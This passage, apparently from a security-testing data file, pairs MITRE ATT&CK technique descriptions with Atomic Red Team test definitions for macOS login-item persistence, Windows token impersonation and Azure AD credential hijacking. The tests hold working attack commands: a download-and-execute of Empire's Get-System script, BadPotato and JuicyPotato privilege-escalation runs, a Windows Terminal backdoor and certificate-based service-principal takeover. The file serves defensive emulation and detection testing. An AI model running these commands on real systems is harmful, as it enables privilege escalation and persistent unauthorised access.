description: Apple. (2016, September 13). Adding Login Items. Retrieved July
11, 2017.
url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html
- source_name: Launch Service Keys Developer Apple
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
- source_name: Launch Services Apple Developer
description: Apple. (n.d.). Launch Services. Retrieved October 5, 2021.
url: https://developer.apple.com/documentation/coreservices/launch_services
- source_name: Login Items AE
description: Apple. (n.d.). Login Items AE. Retrieved October 4, 2021.
url: https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//apple_ref/doc/uid/DTS10003788
- source_name: Open Login Items Apple
description: Apple. (n.d.). Open items automatically when you log in on Mac.
Retrieved October 1, 2021.
url: https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac
- source_name: hexed osx.dok analysis 2019
description: fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved November
17, 2024.
url: https://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html
- source_name: ELC Running at startup
description: 'hoakley. (2018, May 22). Running at startup: when to use a Login
Item or a LaunchAgent/LaunchDaemon. Retrieved October 5, 2021.'
url: https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/
- source_name: Startup Items Eclectic
description: hoakley. (2021, September 16). How to run an app or tool at startup.
Retrieved October 5, 2021.
url: https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/
- source_name: Add List Remove Login Items Apple Script
description: 'kaloprominat. (2013, July 30). macos: manage add list remove
login items apple script. Retrieved October 5, 2021.'
url: https://gist.github.com/kaloprominat/6111584
- source_name: CheckPoint Dok
description: Ofer Caspi. (2017, May 4). OSX Malware is Catching Up, and it
wants to Read Your HTTPS Traffic. Retrieved October 5, 2021.
url: https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/
- source_name: objsee block blocking login items
description: Patrick Wardle. (2018, July 23). Block Blocking Login Items.
Retrieved October 1, 2021.
url: https://objective-see.com/blog/blog_0x31.html
- source_name: objsee netwire backdoor 2019
description: Patrick Wardle. (2019, June 20). Burned by Fire(fox). Retrieved
October 1, 2021.
url: https://objective-see.com/blog/blog_0x44.html
- source_name: objsee mac malware 2017
description: Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September
21, 2018.
url: https://objective-see.com/blog/blog_0x25.html
- source_name: sentinelone macos persist Jun 2019
description: Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS.
Retrieved September 10, 2019.
url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/
- source_name: SMLoginItemSetEnabled Schroeder 2013
description: Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified.
Retrieved November 17, 2024.
url: https://web.archive.org/web/20160216034946/https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:03.355Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.
Login items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.
Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.1'
identifier: T1547.015
atomic_tests:
- name: Persistence by modifying Windows Terminal profile
auto_generated_guid: ec5d76ef-82fe-48da-b931-bdb25a62bc65
description: Modify Windows Terminal settings.json file to gain persistence.
[Twitter Post](https://twitter.com/nas_bench/status/1550836225652686848)
supported_platforms:
- windows
input_arguments:
calculator:
description: Test program used to imitate a maliciously called program.
type: string
default: calculator.exe
settings_json_def:
description: Default file for Windows Terminal to replace the default profile
with a backdoor to call another program.
type: path
default: "~\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\LocalState\\settings.json"
settings_json_tmp:
description: Temp file for Windows Terminal.
type: path
default: "~\\AppData\\Local\\Temp\\settings.json"
wt_exe:
description: Windows Terminal executable.
type: path
default: "~\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.WindowsTerminal_8wekyb3d8bbwe\\wt.exe"
dependency_executor_name: powershell
dependencies:
- description: 'Windows Terminal must be installed
'
prereq_command: 'if (Test-Path #{wt_exe}) {exit 0} else {exit 1}
'
get_prereq_command: '$(rm ~\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\StoreEdgeFD\installed.db
-ErrorAction Ignore; Write-Output ""; $?) -and $(winget install --id=Microsoft.WindowsTerminal)
'
executor:
command: |
mv #{settings_json_def} #{settings_json_tmp}
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}"
wt.exe
cleanup_command: |
mv -Force #{settings_json_tmp} #{settings_json_def}
taskkill /F /IM "#{calculator}" > $null
name: powershell
- name: Add macOS LoginItem using Applescript
auto_generated_guid: 716e756a-607b-41f3-8204-b214baf37c1d
description: |
Runs osascript on a file to create new LoginItem for current user.
NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events"
Therefore, it can't be automated until the TCC is granted.
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
In addition to the `osascript` Process Events, file modification events to
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
supported_platforms:
- macos
input_arguments:
scriptfile:
description: path to Applescript source to add Safari LoginItem.
type: string
default: PathToAtomicsFolder/T1547.015/src/add_login_item.osa
cleanup_script:
description: path to Applescript source to delete Safari LoginItem.
type: string
default: PathToAtomicsFolder/T1547.015/src/remove_login_item.osa
executor:
command: 'osascript #{scriptfile}
'
cleanup_command: 'osascript #{cleanup_script}
'
name: bash
T1134.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--86850eff-2729-40c3-b85e-c4af26da4a2d
created: '2020-02-18T16:39:06.289Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1134/001
external_id: T1134.001
- source_name: Microsoft Command-line Logging
description: Mathers, B. (2017, March 7). Command line process auditing. Retrieved
April 21, 2017.
url: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing
- source_name: DuplicateToken function
description: Microsoft. (2021, October 12). DuplicateToken function (securitybaseapi.h).
Retrieved January 8, 2024.
url: https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetoken
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:04.117Z'
name: 'Access Token Manipulation: Token Impersonation/Theft'
description: |-
Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`.(Citation: DuplicateToken function) The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.
An adversary may perform [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.
When an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://attack.mitre.org/techniques/T1134/002) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) is also distinct from [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) in that it refers to duplicating an existing token, rather than creating a new one.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jonny Johnson
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1134.001
atomic_tests:
- name: Named pipe client impersonation
auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966
description: |-
Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context.
When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose
name: powershell
elevation_required: true
- name: "`SeDebugPrivilege` token duplication"
auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0
description: |-
Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process.
When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).
supported_platforms:
- windows
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose
name: powershell
elevation_required: true
- name: Launch NSudo Executable
auto_generated_guid: 7be1bc0f-d8e5-4345-9333-f5f67d742cb9
description: |-
Launches the NSudo executable for a short period of time and then exits.
NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.
supported_platforms:
- windows
input_arguments:
nsudo_path:
description: Path to the NSudoLG.exe file
type: path
default: PathToAtomicsFolder\T1134.001\bin\NSudoLG.exe
dependency_executor_name: powershell
dependencies:
- description: 'NSudoLG.exe must exist in the specified path #{nsudo_path}
'
prereq_command: 'if (Test-Path "#{nsudo_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components" -Force
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components\NSudo Launcher\x64\NSudoLG.exe" "#{nsudo_path}"
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components.zip" -Recurse -ErrorAction Ignore
Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\NSudo_8.2_All_Components" -Recurse -ErrorAction Ignore
executor:
command: |
Start-Process "#{nsudo_path}" -Argument "-U:T -P:E cmd"
Start-Sleep -Second 5
Stop-Process -Name "cmd" -force -erroraction silentlycontinue
name: powershell
- name: Bad Potato
auto_generated_guid: 9c6d799b-c111-4749-a42f-ec2f8cb51448
description: |-
https://github.com/BeichenDream/BadPotato
Privilege escalation using named pipe connections
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'BadPotato.exe must exist in the temp directory
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe")
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\BadPotato.exe" "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/bin/BadPotato.exe?raw=true"
executor:
command: |
cd "PathToAtomicsFolder\..\ExternalPayloads"
Start-Process .\BadPotato.exe notepad.exe
Start-Sleep -Second 20
Stop-Process -Name "notepad" -force -erroraction silentlycontinue
Stop-Process -Name "BadPotato" -force -erroraction silentlycontinue
cleanup_command: 'taskkill /f /im notepad.exe
'
name: powershell
elevation_required: true
- name: Juicy Potato
auto_generated_guid: f095e373-b936-4eb4-8d22-f47ccbfbe64a
description: "This Atomic utilizes Juicy Potato to obtain privilege escalation.
\nUpon successful execution of this test, a vulnerable CLSID will be used
to execute a process with system permissions.\nThis tactic has been previously
observed in SnapMC Ransomware, amongst numerous other campaigns. \n[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)"
supported_platforms:
- windows
input_arguments:
potato_path:
description: Path to the JuicyPotato.exe file
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe
listening_port:
description: COM server listen port
type: integer
default: 7777
target_exe:
description: Target executable to launch with system privileges
type: path
default: "$env:windir\\system32\\notepad.exe"
target_CLSID:
description: Vulnerable CLSID to impersonate privileges
type: string
default: "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}"
dependency_executor_name: powershell
dependencies:
- description: 'JuicyPotato.exe must exist on disk
'
prereq_command: 'if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe")
{exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\JuicyPotato.exe" "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe"
executor:
command: 'cmd /c ''#{potato_path}'' -l ''#{listening_port}'' -t * -p ''#{target_exe}''
-c ''#{target_CLSID}''
'
cleanup_command: |
get-ciminstance Win32_Process | where-object { $_.Path -eq "#{target_exe}" } | invoke-cimmethod -methodname "terminate" | out-null
get-ciminstance Win32_Process | where-object { $_.Path -eq "#{potato_path}" } | invoke-cimmethod -methodname "terminate" | out-null
name: powershell
elevation_required: true
T1098.001:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1098/001
external_id: T1098.001
- source_name: Crowdstrike AWS User Federation Persistence
description: " Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries
Can Persist with AWS User Federation. Retrieved March 10, 2023."
url: https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/
- source_name: Expel IO Evil in AWS
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
url: https://expel.io/blog/finding-evil-in-aws/
- source_name: SpecterOps Azure Privilege Escalation
description: Andy Robbins. (2021, October 12). Azure Privilege Escalation
via Service Principal Abuse. Retrieved April 1, 2022.
url: https://posts.specterops.io/azure-privilege-escalation-via-service-principal-abuse-210ae2be2a5
- source_name: Demystifying Azure AD Service Principals
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
- source_name: Lacework AI Resource Hijacking 2024
description: Detecting AI resource-hijacking with Composite Alerts. (2024,
June 6). Lacework Labs. Retrieved July 1, 2024.
url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
- source_name: Permiso Scattered Spider 2023
description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
url: https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815
- source_name: Blue Cloud of Death
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
- source_name: Microsoft Entra ID App Passwords
description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
authentication with legacy applications using app passwords. Retrieved May
28, 2024.
url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
- source_name: Mandiant APT42 Operations 2024
description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
Retrieved May 28, 2024.'
url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
October 1, 2020.'
url: https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/
- source_name: Sysdig ScarletEel 2.0
description: 'SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. (2023, July
11). SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto. Retrieved July 12,
2023.'
url: https://sysdig.com/blog/scarleteel-2-0/
- source_name: Rhino Security Labs AWS Privilege Escalation
description: Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods
and Mitigation. Retrieved May 27, 2022.
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:04.839Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
Guidance) With sufficient permissions, there are a variety of ways to add
credentials including the Azure Portal, Azure command line interface, and
Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
or ImportKeyPair API in AWS or the gcloud compute os-login
ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows
persistent access to instances within the cloud environment without further
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create command
in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
API in AWS to add a password that can be used to log into the AWS Management
Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
If the target account has different permissions from the requesting account,
the adversary may also be able to escalate their privileges in the environment
(i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)
\n\nIn AWS environments, adversaries with the appropriate permissions may
also use the `sts:GetFederationToken` API call to create a temporary set of
credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606)
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
Persistence)\n\nIn Entra ID environments with the app password feature enabled,
adversaries may be able to add an app password to a user account.(Citation:
Mandiant APT42 Operations 2024) As app passwords are intended to be used with
legacy devices that do not support multi-factor authentication (MFA), adding
an app password can allow an adversary to bypass MFA requirements. Additionally,
app passwords may remain valid even if the user’s primary password is reset.(Citation:
Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Zur Ulianitzky, XM Cyber
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
- Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- Identity Provider
- SaaS
x_mitre_version: '2.8'
identifier: T1098.001
atomic_tests:
- name: Azure AD Application Hijacking - Service Principal
auto_generated_guid: b8e747c3-bdf7-4d71-bce2-f1df2a057406
description: |
Add a certificate to an Application through its Service Principal. The certificate can then be used to authenticate as the application.
This can be used for persistence, and also for privilege escalation by benefiting from the Application's rights.
An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
supported_platforms:
- azure-ad
input_arguments:
username:
description: Azure AD username
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: string
default: p4sswd
service_principal_name:
description: Name of the targeted service principal
type: string
default: SuperSP
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AzureAD -Force
'
executor:
command: |
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential > $null
$sp = Get-AzureADServicePrincipal -SearchString "#{service_principal_name}" | Select-Object -First 1
if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$credNotAfter = (Get-Date).AddDays(1)
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $sp.AppId -CertificateThumbprint $cert.Thumbprint
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord
= ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential
= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
\"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential -ErrorAction
Ignore > $null\n\n$sp = Get-AzureADServicePrincipal -SearchString \"#{service_principal_name}\"
| Select-Object -First 1\n$credz = Get-AzureADServicePrincipalKeyCredential
-ObjectId $sp.ObjectId\nforeach ($cred in $credz) {\n if ([System.Text.Encoding]::ASCII.GetString($cred.CustomKeyIdentifier)
-eq \"AtomicTest\") {\n Write-Host \"Removed $($cred.KeyId) key from
SP\"\n Remove-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
-KeyId $cred.KeyId\n } \n}\nGet-ChildItem -Path Cert:\\CurrentUser\\My
| where { $_.FriendlyName -eq \"AtomicCert\" } | Remove-Item\n"
name: powershell
elevation_required: false
- name: Azure AD Application Hijacking - App Registration
auto_generated_guid: a12b5531-acab-4618-a470-0dafb294a87a
description: |
Add a certificate to an Application through its App Registration. The certificate can then be used to authenticate as the application.
This can be used for persistence, and also for privilege escalation by benefiting from the Application's rights.
An account with high-enough Azure AD privileges is needed, such as Global Administrator or Application Administrator. The account authentication must be without MFA.
supported_platforms:
- azure-ad
input_arguments:
username:
description: Azure AD username
type: string
default: jonh@contoso.com
password:
description: Azure AD password
type: string
default: p4sswd
application_name:
description: Name of the targeted application
type: string
default: SuperApp
dependency_executor_name: powershell
dependencies:
- description: 'AzureAD module must be installed.
'
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AzureAD -Force
'
executor:
command: |
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential > $null
$app = Get-AzureADApplication -SearchString "#{application_name}" | Select-Object -First 1
if ($app -eq $null) { Write-Warning "Application not found"; exit }
# in the context of an ART test (and not a real attack), we don't need to keep access for too long. In case the cleanup command isn't called, it's better to ensure that everything expires after 1 day so it doesn't leave this backdoor open for too long
$credNotAfter = (Get-Date).AddDays(1)
$certNotAfter = (Get-Date).AddDays(2) # certificate expiry must be later than cred expiry
$cert = New-SelfSignedCertificate -DnsName "atomicredteam.example.com" -FriendlyName "AtomicCert" -CertStoreLocation Cert:\CurrentUser\My -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter $certNotAfter
$keyValue = [System.Convert]::ToBase64String($cert.GetRawCertData())
Write-Host "Generated certificate ""$($cert.Thumbprint)"""
New-AzureADApplicationKeyCredential -ObjectId $app.ObjectId -Type AsymmetricX509Cert -CustomKeyIdentifier "AtomicTest" -Usage Verify -Value $keyValue -EndDate $credNotAfter
Start-Sleep -s 30
$tenant = Get-AzureADTenantDetail
$auth = Connect-AzureAD -TenantId $tenant.ObjectId -ApplicationId $app.AppId -CertificateThumbprint $cert.Thumbprint
